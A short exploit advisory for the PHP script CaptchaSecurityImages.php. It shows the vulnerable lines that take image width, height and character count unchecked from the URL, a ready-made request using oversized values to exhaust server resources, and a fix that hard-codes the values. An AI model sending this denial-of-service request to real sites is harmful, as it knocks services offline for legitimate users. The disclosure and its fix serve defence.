# Exploit Title: CaptchaSecurityImages.php Denial Of Service# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com | www.DigitalWhisper.co.il# Software Link: http://www.white-hat-web-design.co.uk/articles/php-captcha.php###[Denial Of Service](OWASP: The Denial of Service (DoS) attack is focused on making unavailable a resource (site, application, server)for the purpose it was designed. There are many ways to make a service unavailable for legitimate users by manipulating network packets, programming, logical,or resources handling vulnerabilities, among others. If a service receives a very large number of requests, it may stop providing service to legitimate users. In the same way, a service may stop if a programming vulnerability is exploited,or the way the service handles resources used by it.)##Exploit:/CaptchaSecurityImages.php?width=13333337&height=13333337&characters=13333337##
The vuln code is:(lines 73-75)#
$width = isset($_GET['width']) ? $_GET['width']:'120';
$height = isset($_GET['height']) ? $_GET['height']:'40';
$characters = isset($_GET['characters'])&& $_GET['characters']>1 ? $_GET['characters']:'6';#
To fix it- delete all the "$_GET[x]" strings and make it constant, like this:#
$width=100;
$height=40;
$characters=5;###[e0f]
